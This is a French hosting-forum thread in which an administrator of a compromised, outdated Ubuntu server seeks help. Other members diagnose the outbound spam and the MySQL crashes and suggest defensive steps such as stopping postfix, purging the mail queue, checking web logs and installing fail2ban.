Jul 31 08:52:28 ns postfix/cleanup[9765]: 501D82B3B7: message-id=<20160731065228.501D82B3B7@ns.ovh.net>

bbr18
31/07/2016, 09h54
regarde aussi les entêtes des mails pour voir qui les envoie, tu as aussi mail.log
et si tu es sou virtualmin, regarde les logs dans /var/log/virtualmin

fritz2cat
31/07/2016, 09h46
Vois le log Apache (peut-être dans /var/log/apache2 )

arn0
31/07/2016, 09h27
RE OVH a debloqué (surement de facon auto) la restriction concernant les SPAM du coup de nouveau eu une saturation et le serveur a planté... J'ai coupé postfix et vider la queue.

Par contre dans quel fichier log je peux vois quel script le hacker utilise pour envoyer les SPAMS ? Car je n'ai pas de CMS ou autre. c'est un portail ("maison" donc sans CMS) où l'utilisateur doit s'authentifier via un code

arn0
31/07/2016, 08h35
Bonjour

Je reviens vers vous car j'ai a nouveau un soucis je n'accede plus à rien et dans les syslog j'ai :

Jul 31 08:26:43 init: tty1 main process (5694) killed by KILL signal
Jul 31 08:26:43 init: tty1 main process ended, respawning
Jul 31 08:26:44 init: tty4 main process (8037) killed by KILL signal
Jul 31 08:26:44 init: tty4 main process ended, respawning
Jul 31 08:26:44 init: tty5 main process (19509) killed by KILL signal
Jul 31 08:26:44 init: tty5 main process ended, respawning
Jul 31 08:26:44 init: tty2 main process (19510) killed by KILL signal
Jul 31 08:26:44 init: tty2 main process ended, respawning
Jul 31 08:26:44 init: tty3 main process (21541) killed by KILL signal

buddy
29/07/2016, 12h21
Réinstaller le serveur aussi permet pour certains de se débarrasser d'un OS en EOL. Mais oui il faut aussi mettre à jour le CMS et repartir sur des backups sains..

sich
29/07/2016, 10h03
D'où l'indication de commencer par trouver d'où vient le problème.... Souvent un cms pas à jour...
En effet réinstaller le serveur sans toucher aux sites ça ne sert pas à grand chose...

TBC_Ly0n
29/07/2016, 02h19
Citation Envoyé par bbr18
si tu ne sais/peux pas faire l'étape 3 : réinstaller ton serveur et le sécuriser (la réinstall lorsque c'est autant vérolé est la meilleure option)
Pas d'accord. La faille serait toujours là après réinstallation. Donc, les failles reviendront aussitôt... Donc, en soit, ce n'est pas une solution.

Nowwhat
28/07/2016, 10h48
Citation Envoyé par arn0
...... Je vais également vider la "queue" et arreter postfix
Google : vider queue postfix

buddy
28/07/2016, 10h33
Ip tables avec le numéro du port...
Sinon simplement couper postfix réglera le problème

arn0
28/07/2016, 10h21
Bonjour

Suite à mon soucis d'envoi de SPAM, je compte bloquer le port 25 de mon serveur. Je ne connais pas la commande à faire ou les lignes à inserer ? J'utilise également Webmin/virtualmin. Pouvez-vous m'aider svp ?

Je vais également vider la "queue" et arreter postfix

libralinux
20/07/2016, 19h27
Cela mettra surement quelques librairies à jour mais qui ne risquent pas d entrainer de dysfonctionnement. Cependant, cela ne reglera pas l'origine de ton problème. Il faut chercher via les logs de ton serveur web (sans doute) la cause de cette exploit.

buddy
20/07/2016, 15h17
çà veut dire que vous n'avez fait aucune mise à jour de sécurité depuis que le serveur est installé ?
pour aucun paquet ?

Quand tu installes fail2ban, il te demande d'accepter avant l'installation la mise à jour des paquets.
Mais il y aura forcément 1 ou 2 librairies à mettre à jour.

arn0
20/07/2016, 15h00
C'est un ubuntu 8.04 (je sais que sa craint mais c'est prévu comme dit plus haut)

Je n'ose pas mettre à jour les paquets ou autre car comme dit, il y a des programmes "maisons" adapté pour cette version d'ubuntu donc s'il y a une MAJ qui se lance les programmes risquent de ne plus fonctionner et comme c'est un serveur en prod sa peut etre compliqué...

J'aimerais comme meme installer un fail2ban dessus (en attendant de changer de distrib) mais je ne sais pas si cela va mettre a jour d'autres choses en l'installant et si c'est possible avec une vielle version ?

buddy
20/07/2016, 14h46
Concrètement tu parles de quelle version d'ubuntu ?

apt-get update && apt-get install fail2ban ne marche pas ?

arn0
20/07/2016, 14h32
Il y a un Ubuntu qui n'est plus maintenue. C'est prévu de passer a une version récente mais comme c'est un système maison avec des programmes assez spécifique fait tout réadapter

Concernant les messages système je ne les reçoit pas apparement. Je regarde directement dans syslog, messages, kern etc.

Donc je pense dans un premier temps couper postfix et bloquer le port 25. Yia t il d'autres ports à bloquer dans iptabkes?

Peut on installer fail2ban sur une vieille version ?

captainadmin
20/07/2016, 11h45
Hello,

Le probleme de laisser couper ton postfix c'est que tu ne pourras plus envoyer de message système pour te tenir informé de l'état ou des problèmes du serveur.
Ce n'est sans doute pas le cas mais ca reste un service pratique.

Il faut sécuriser un minimum le serveur, firewall, fail2ban, sshguard et bien d'autres te permettront de faire des choses un peu plus propres.
Tu devrais aussi sécuriser ton serveur postfix et voici quelques configurations possibles
http://postfix.traduc.org/index.php/...SS_README.html
https://blog.hbis.fr/2009/07/04/postfix-blacklist/

Sinon tu peux couper ton postfix et le désactiver au démarrage pour éviter ce genre de désagrément.
Par contre c'est assez brutal et ca ne résoud pas le problème de fond -- ton serveur a des failles de sécu.

Bon courage
https://www.captainadmin.com

bbr18
20/07/2016, 11h43
le problème ne vient pas de postfix lui-même mais d'une faille de sécurité dont s'est servi quelqu'un pour utiliser ton serveur comme machine à spammer.
1 - trouver où est la faille (cms pas à jour, distribution pas à jour, script codé avec les pieds, etc.)
2 - remédier à cette faille
3 - nettoyer le serveur
3 - rebooter le serveur

si tu ne sais/peux pas faire l'étape 3 : réinstaller ton serveur et le sécuriser (la réinstall lorsque c'est autant vérolé est la meilleure option)

Quelle distribution/panel sur ce serveur ?

arn0
20/07/2016, 10h56
Citation Envoyé par fritz2cat
postfix stop
avec cette commande Postfix sera arrêté , tout s'empilera et tu pourras voir l'état de la queue avec la commande mailq.
D'accord mais est ce que je peux laisser couper postfix en permanence afin de résoudre en partie le problème de spam sans causer d'autres soucis sur le serveur ?

fritz2cat
20/07/2016, 10h13
postfix stop
avec cette commande Postfix sera arrêté , tout s'empilera et tu pourras voir l'état de la queue avec la commande mailq.

arn0
20/07/2016, 08h04
Ok merci je vais essayer de regarder sa.

Par contre le fait de laisser couper le service Postfix de façon permanente et de fermer la porte 25 peut en parti palier à ce problème ou pas ?

D'ailleurs qu'elle est la bonne commande pour bloquer le port 25? Car sur le net il y a plusieurs commandes

Nowwhat
19/07/2016, 16h30
Citation Envoyé par arn0
O....
ÉDIT : Ou je peux chercher dans les logs la source de ces spams ?
Tu l'as déjà montré :
Jul 17 12:11:24 postfix/qmgr[5368]: 669D89AE8B: from=<www-data@ns.ovh.net>, size=5031, nrcpt=1 (queue active)
www-data est l’utilisateur sous laquelle tourne ton .... serveur web (Apache2 normalement).
Arrêter ton serveur web et l'injection des mails va s'arrêter.
Puis inspecte ton répertoire "documentroot" ils ont du (les types méchant) utiliser les scripts déjà présent (tes scripts !!) avec des failles pour uploader leur propre scripts (html, PHP, JS et autre) pour préparer les mails et simplement les envoyer avec la fonction mail() de PHP. C'est archi connue ....

arn0
19/07/2016, 15h06
Ok donc si je comprend bien. Il y a eu tellement d'envoi de spam que le serveur à kill un service en l'occurrence mysql. J'essayerai de mettre l'autre partie des logs quand je peux.

Je n'utilise pas de CMS, ni de formulaire de contact. C'est juste un site qui permet l'authentification des users sur un portail captif...

Concernant postfix je peux carrément l'arrêté non ?

ÉDIT : Ou je peux chercher dans les logs la source de ces spams ?

Nowwhat
18/07/2016, 08h00
Citation Envoyé par arn0
.....
Le fait que le port 25 soit coupé par OVH ne gene pas le bon fonctionnement (service utilisé : apache, web, BD) ou faut-il que je resoud cela rapidement ? (je susi en congés uen petite semaine)
La porte "25" fermé, tu ne spamme plus la planète entier.
Nous, nous risquons donc plus rien.
Mais le queue de serveur mail (postfix) va se remplir. Et il est rempli par Apache2, ton serveur web, qui a reçu l'ordre de faire ainsi avec des scripts, à parier des scripts de ton (tes) sites webs - voir ce que je t'ai dit plus haut et la réponse de TBC_Ly0n.
Pense à vider (== purger) ce queue.

Bien sur, la fabrication de ces mails-spam va couter des ressources donc entre autre la mémoire jusqu'à bouquet final, et l'OS va buter un service au choix pour ne pas planter carrément. Souvent, c'est le service MySQL qui est éjecté.

TBC_Ly0n
18/07/2016, 02h24
Il manque des morceaux du kern.log qui permettraient de comprendre.
Je suspecte un OOM-killer qui aurait buté MySQL.

Quant à Postfix, il est urgent de trouver d'où proviennent ces spams et supprimer la source... (surement des scripts PHP posés au travers d'un CMS pourri jusqu'à la moelle...)

arn0
17/07/2016, 14h30
RE.

Bon j'ai réussi à remettre en route le serveur. Sa fonctionne. Le serveur mysl était carrément arrété... Pouvez-vous m'expliquer le pourquoi avec les logs kern car je comprend pas toutes les lignes...

Concernant l'envoi de mail, je n'utilise pas ce serveur en temps que serveur mail... Donc comment faire pour que ce serveur n'envoit plus de mail par le hackeur ? (changer le mot de passe SSH, couper postfix?) Le fait que le port 25 soit coupé par OVH ne gene pas le bon fonctionnement (service utilisé : apache, web, BD) ou faut-il que je resoud cela rapidement ? (je susi en congés uen petite semaine)

Nowwhat
17/07/2016, 14h01
Oubli ton serveur MYSQL pour le moment.
Ton serveur est contaminé, soit devenu un open relay : il envoi des spams de la part de 'quelqu'un' (autrement dit : le hackeur).
Ça fait que ton IP est - ou sera bientôt - blackisté partout. Donc même si tu trouve la source du problème (probablement un site web avec des scripts qui ont des failles) t’auras du mal a envoyer des mails car ils seront refusés d'office.
T'as intérêt t'as faire un peu de maintenance - entretien de ton serveur.

arn0
17/07/2016, 13h32
Bonjour

Je rencontre actuellement un soucis sur un serveur. "mysql error connexion impossible" "ERROR 2002'

Dans les logs j'ai des trucs bisard (pas en rapport avec myslq a priori)

kern.log

Code:
 kernel: HighMem per-cpu:
Jul 16 22:49:37  kernel: CPU    0: hi:  186, btch:  31 usd:  24
Jul 16 22:49:37  kernel: CPU    1: hi:  186, btch:  31 usd:  40
Jul 16 22:49:37  kernel: CPU    2: hi:  186, btch:  31 usd: 170
Jul 16 22:49:37  kernel: CPU    3: hi:  186, btch:  31 usd:  14
Jul 16 22:49:37  kernel: CPU    4: hi:  186, btch:  31 usd:  95
Jul 16 22:49:37  kernel: CPU    5: hi:  186, btch:  31 usd:  23
Jul 16 22:49:37  kernel: CPU    6: hi:  186, btch:  31 usd:  46
Jul 16 22:49:37  kernel: CPU    7: hi:  186, btch:  31 usd:   0
Jul 16 22:49:37  kernel: CPU    8: hi:  186, btch:  31 usd:   0
Jul 16 22:49:37  kernel: CPU    9: hi:  186, btch:  31 usd:   0
Jul 16 22:49:37  kernel: CPU   10: hi:  186, btch:  31 usd:   4
Jul 16 22:49:37  kernel: CPU   11: hi:  186, btch:  31 usd:   3
Jul 16 22:49:37  kernel: CPU   12: hi:  186, btch:  31 usd:  16
Jul 16 22:49:37  kernel: CPU   13: hi:  186, btch:  31 usd:   2
Jul 16 22:49:37  kernel: CPU   14: hi:  186, btch:  31 usd:   0
Jul 16 22:49:37  kernel: CPU   15: hi:  186, btch:  31 usd:  29
Jul 16 22:49:37  kernel: active_anon:90969 inactive_anon:32 isolated_anon:0
Jul 16 22:49:37  kernel:  active_file:1147658 inactive_file:60638 isolated_file:0
Jul 16 22:49:37  kernel:  unevictable:0 dirty:127 writeback:0 unstable:0
Jul 16 22:49:37  kernel:  free:11051845 slab_reclaimable:21618 slab_unreclaimable:21591
Jul 16 22:49:37  kernel:  mapped:4290 shmem:57 pagetables:3265 bounce:0
Jul 16 22:49:37  kernel: DMA free:3456kB min:64kB low:80kB high:96kB active_anon:0kB inactive_anon:0kB active_file:0kB inactive_file:0kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:15788kB mlocked:0kB dirty:0kB writeback:0kB mapped:0kB shmem:0kB slab_reclaimable:1396kB slab_unreclaimable:10956kB kernel_stack:80kB pagetables:0kB unstable:0kB bounce:0kB writeback_tmp:0kB pages_scanned:0 all_unreclaimable? yes
Jul 16 22:49:37  kernel: lowmem_reserve[]: 0 863 48677 48677
Jul 16 22:49:37  kernel: Normal free:51232kB min:3724kB low:4652kB high:5584kB active_anon:0kB inactive_anon:0kB active_file:256kB inactive_file:508kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:883912kB mlocked:0kB dirty:172kB writeback:0kB mapped:4kB shmem:0kB slab_reclaimable:85076kB slab_unreclaimable:75408kB kernel_stack:4008kB pagetables:13060kB unstable:0kB bounce:0kB writeback_tmp:0kB pages_scanned:2814 all_unreclaimable? yes
Jul 16 22:49:37  kernel: lowmem_reserve[]: 0 0 382512 382512
Jul 16 22:49:37  kernel: HighMem free:44152692kB min:512kB low:52100kB high:103692kB active_anon:363876kB inactive_anon:128kB active_file:4590376kB inactive_file:242044kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:48961580kB mlocked:0kB dirty:336kB writeback:0kB mapped:17156kB shmem:228kB slab_reclaimable:0kB slab_unreclaimable:0kB kernel_stack:0kB pagetables:0kB unstable:0kB bounce:0kB writeback_tmp:0kB pages_scanned:0 all_unreclaimable? no
Jul 16 22:49:37  kernel: lowmem_reserve[]: 0 0 0 0
Jul 16 22:49: kernel: DMA: 10*4kB 65*8kB 25*16kB 2*32kB 2*64kB 4*128kB 5*256kB 1*512kB 0*1024kB 0*2048kB 0*4096kB = 3456kB
Jul 16 22:49:37 kernel: Normal: 11058*4kB 775*8kB 47*16kB 1*32kB 0*64kB 0*128kB 0*256kB 0*512kB 0*1024kB 0*2048kB 0*4096kB = 51216kB
Jul 16 22:49:37 kernel: HighMem: 2897*4kB 1085*8kB 29109*16kB 1622*32kB 235*64kB 209*128kB 2434*256kB 872*512kB 143*1024kB 62*2048kB 10310*4096kB = 44152444kB
Jul 16 22:49:37  kernel: 1208403 total pagecache pages
Jul 16 22:49:37  kernel: 0 pages in swap cache
Jul 16 22:49:37  kernel: Swap cache stats: add 0, delete 0, find 0/0
Jul 16 22:49:37  kernel: Free swap  = 0kB
Jul 16 22:49:37  kernel: Total swap = 0kB
J'ai egalement plein de message dans syslog de ce type :

Jul 17 12:11:24 postfix/smtp[3473]: connect to inmx.rambler.ru[81.19.78.64]:25: Connection timed out
Jul 17 12:11:24 postfix/smtp[5684]: connect to mxa-00105401.gslb.pphosted.com[67.231.152.184]:25: Connection timed out
Jul 17 12:11:24 postfix/smtp[5684]: 1EBC08BB80: to=, relay=none, delay=118893, delays=117736/1097/60/0, dsn=4.4.1, status=deferred (connect to mxa-00105401.gslb.pphosted.com[67.231.152.184]:25: Connection timed out)
Jul 17 12:11:24 postfix/qmgr[5368]: 6F82C5A6A8: from=, size=5024, nrcpt=1 (queue active)
Jul 17 12:11:24 postfix/smtp[5684]: 1A6B21F389: to=, relay=none, delay=119495, delays=118340/1155/0.18/0, dsn=4.4.3, status=deferred (Host or domain name not found. Name service error for name=harbey.ie type=MX: Host not found, try again)
Jul 17 12:11:24 postfix/qmgr[5368]: 669D89AE8B: from=, size=5031, nrcpt=1 (queue active)
Jul 17 12:11:24 postfix/smtp[2569]: connect to je-smtp-inbound-1.mimecast-offshore.COM[213.167.75.36]:25: Connection timed out
Jul 17 12:11:25 postfix/smtp[22858]: connect to napier-ac-uk.mail.eo.outlook.com[
J'ai également une alerte anti spam ovh sur une IP :

Notre protection Anti-Spam a détecté un envoi important de spam à partir d'une de vos IP:

Afin d'assurer la sécurité de notre réseau le trafic sortant de votre serveur vers les
ports 25 a été suspendu.

Afin que vous puissiez effectuer les vérifications voici un échantillon des emails bloqués:

Destination IP: 74.125.206.26 - Message-ID: 20160716004752.EEBB184D83@ns.ovh.net - Spam score: 349
Destination IP: 65.55.92.184 - Message-ID: 20160716004752.B794484C41@ns.ovh.net - Spam score: 349
Destination IP: 74.125.206.26 - Message-ID: 20160716004753.0E29D84D8C@ns.ovh.net - Spam score: 349
Destination IP: 65.55.92.152 - Message-ID: 20160716004750.1425A84C5F@ns.ovh.net - Spam score: 349
Destination IP: 134.170.2.199 - Message-ID: 20160716004752.2B7FF84D4D@ns.ovh.net - Spam score: 349
Mai sle fait de couper le port 25 ne doit pas faire planter sql ?
Que dois je faire svp ? Pouvez-vou sm'aider ?